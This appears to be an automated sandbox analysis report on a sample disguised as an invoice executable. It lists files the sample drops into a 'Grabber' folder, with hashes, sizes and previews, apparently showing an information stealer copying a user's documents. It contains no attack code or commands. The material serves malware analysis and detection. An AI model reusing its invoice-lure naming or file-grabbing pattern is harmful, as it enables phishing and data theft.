C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5258560106596737
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
MD5:	06E8F7E6DDD666DBD323F7D9210F91AE
SHA1:	883AE527EE83ED9346CD82C33DFC0EB97298DC14
SHA-256:	8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
SHA-512:	F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5218877566914193
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
MD5:	50A956778107A4272AAE83C86ECE77CB
SHA1:	10BCE7EA45077C0BAAB055E0602EEF787DBA735E
SHA-256:	B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
SHA-512:	D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\NWTVCDUMOB.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\LTKMYBSEYZ.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\ZBEDCJPBEY.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
